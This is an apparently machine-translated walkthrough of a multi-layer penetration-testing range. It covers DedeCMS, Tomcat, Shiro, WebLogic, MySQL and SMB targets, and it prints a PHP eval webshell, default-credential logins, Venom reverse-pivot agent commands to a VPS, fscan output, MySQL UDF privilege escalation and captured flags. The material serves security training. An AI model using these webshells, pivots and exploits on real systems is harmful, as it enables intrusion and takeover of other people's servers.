official wp： https://mp.weixin.qq.com/s/SGiEnT28JyAuWK9DC4T4-w

Intranet topology

Thank the western regions' Imperial Guard for providing such a good cfs shooting range

1.DEDECMS

First of all dedecms, The membership function has been turned off , The landing port at the front desk is useless

ps.dedecms Some loopholes

File upload payload：https://zhzhdoai.github.io/2019/07/28/Dedecms%E5%90%8E%E5%8F%B0getshell%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/
backstage getshell：
https://zhzhdoai.github.io/2019/03/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-DedeCMS%E5%90%8E%E5%8F%B0getshell/
Blast background directory （ I tried this and it worked ）：
https://mochazz.github.io/2018/02/26/DEDECMS%E6%89%BE%E5%90%8E%E5%8F%B0%E7%9B%AE%E5%BD%95%E6%8A%80%E5%B7%A7/

Feel casually or prepare to scan the website directory first
dirsearch Scan it with your dictionary

python dirsearch.py -e php -s 1 -w worlist.dic -u http://xxx/
-s  Is delayed access 

visit robots.txt

User-agent: * 
Disallow: /ffffffffllllllllllaaaaaaaagggggg22222222222.txt
Disallow: /plus/ad_js.php
Disallow: /plus/advancedsearch.php
Disallow: /plus/car.php
Disallow: /plus/carbuyaction.php
Disallow: /plus/shops_buyaction.php
Disallow: /plus/erraddsave.php
Disallow: /plus/posttocar.php
Disallow: /plus/disdls.php
Disallow: /plus/feedback_js.php
Disallow: /plus/mytag_js.php
Disallow: /plus/rss.php
Disallow: /plus/search.php
Disallow: /plus/recommend.php
Disallow: /plus/stow.php
Disallow: /plus/count.php
Disallow: /include
Disallow: /templets

visit /ffffffffllllllllllaaaaaaaagggggg22222222222.txt, obtain flag2

flag{dc53e209ffa7f1cd8c7ebdc2eeff34a7}

Also sweep with the imperial sword , Find out dede, It's backstage


Weak password admin/admin land , Then upload the background file
Local structure 1.jpg.php（ The content is <?php if(md5($_POST["pass"])==" Cryptographically md5"){@eval($_POST[a]);} ?>）－> Compress it into 1.jpg.zip
File manager in the background , Will compress files 1.jpg.zip Upload to soft Under the table of contents

visit dede/album_add.php
Select from zip Decompress the pictures in the compressed package , Browse 1.jpg.zip

Fill in the title column and everything （ I also built one myself ）

But the atlas can't be passed on , Once released, it's gone , Laugh to death , Later, I found that the file manager directly transmits shell That's it , I'm stupid

Connect the root directory to get flag1 flag{f784234649d7ef161229349d1d76ba8d}

2. Second layer detection + forward

ifconfig You can find two network cards , Try Venom Intranet online

https://blog.csdn.net/u011215939/article/details/103403545
https://xz.aliyun.com/t/4058

VPS :  ./admin_linux_x64 -lport 1233
 Controlled end ： ./agent_linux_x86 -rhost [VPS IP] -rport 1233

According to the intranet topology ,172.16.20.x There are three machines in the section ,fscan Scan the Intranet

./f -h 172.16.20.1/24

tomcat ： WebTitle:http://172.16.20.38:8080  code:200 len:20     title:Apache Tomcat/8.0.43
shiro ： WebTitle:http://172.16.20.76:8080/login;jsessionid=F3762797C5577813BA84F48ADAC8D740 code:200 len:10     title:Login Page
weblogic ：http://172.16.20.62:7001 poc-yaml-weblogic-cve-2020-14750

Do traffic forwarding , Set up to node1 Of socks5 agent

Set up socks5 agent ,proxifier Open a global agent locally , Successfully visit the second tier website

2.1 tomcat

http://172.16.20.38:8080/ Of tomcat The management interface is the default password tomcat/tomcat
Refer to this article （https://blog.csdn.net/zminr411421_/article/details/52115783） stay manager Inside getshell
take shell.jsp Compressed into zip file shell.zip, Change suffix to war shell.war

Find the name of the compressed package you uploaded , Click in


Ice scorpions connect , Get the root directory flag3 flag{03bbcaf39bdd08fa8d0d9e5477e102c5}

The machine tomcat Wait a minute, I want to be the third tier agent

2.2 shiro

standard shiro Interface

Not connected to the memory horse , I don't know why ,flag4 eureka flag{22fceae28669c34d139f7ff6db690acb}

2.3 weblogic

fscan Sweep it out 7001 There is a loophole in the port

[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2020-14750

use Java Deserialization exploit tool , obtain flag5 flag{b717ca3e4543f05e6970ede833d68ba4}

3. The third level

installed tomcat Your host also has an intranet IP：10.2.5.20

vemon Node online
listen 1346

./1 -rhost 172.16.20.66 -rport 1346

Open a socks passageway

Configure agent

Upload fscan Scan Intranet
Chmod 777 fscan_amd64
./fscan_amd64 -h 10.2.5.1/24

10.2.5.33:3306 open
10.2.5.51:445 open
10.2.5.51:139 open
10.2.5.134:80 open
10.2.5.44:8080 open
10.2.5.20:8080 open
10.2.5.20:8009 open
[+] mysql:10.2.5.33:3306:root 123456
[*] WebTitle:http://10.2.5.20:8080     code:200 len:20     title:Apache Tomcat/8.0.43
[*] 10.2.5.51  (Windows 6.1)
[*] WebTitle:http://10.2.5.134         code:200 len:43     title: Film and television  -  The latest TV series , The latest movie 
[*] WebTitle:http://10.2.5.44:8080     code:404 len:0      title:None
[+] InfoScan:http://10.2.5.44:8080     [SprintBoot] 
[+] http://10.2.5.20:8080/manager/html tomcat tomcat
[+] http://10.2.5.20:8080 poc-yaml-tomcat-manager-week

Log4j2：http://10.2.5.44:8080？
Mysql：10.2.5.33:3306
Smb ：10.2.5.51 (Windows 6.1) to open up 445 and 139
Jboss ： I didn't get it , But on the second floor jboss, Does it mean that

3.1 mysql

Mysql There is a weak password

[+] mysql:10.2.5.33:3306:root 123456

Navicat Connect ,flag Not in the database , It should be in the server , Need to rely on mysql perform Linux Command to read the file

When mysql secure_file_priv Configuration item is empty （ Empty is "" instead of NULL,NULL Represents unreadable ）, Or specify a directory , You can read the file .

mysql Command line view secure_file_priv To configure

show variables like "%secure_file_priv%";

Can read files , But I don't know flag Where is the

It can be used udf Raise the power to execute the order

show variables like '%compile%';             # View the host version and architecture 
show variables like 'plugin%';               # see  plugin  Catalog 

/usr/local/mysql/lib/plugin/

MDUT udf Raise the right
You can refer to ：https://m.xp.cn/b.php/58475.html
https://xz.aliyun.com/t/7392#toc-12


obtain flag7 flag{4e137c4035538ba1f76ce4d661c3006f

3.2 Smb

Smb ：10.2.5.51 (Windows 6.1) to open up 445 and 139

To configure kali The agent inside ProxyChains
https://www.cnblogs.com/student-programmer/p/6727346.html

vim /etc/proxychains4.conf

Open with proxy msf：

proxychains msfconsole

That's it ,sock The connection is unstable ,smb I can't fight all the time , Later, the shooting range was closed and I didn't fight anymore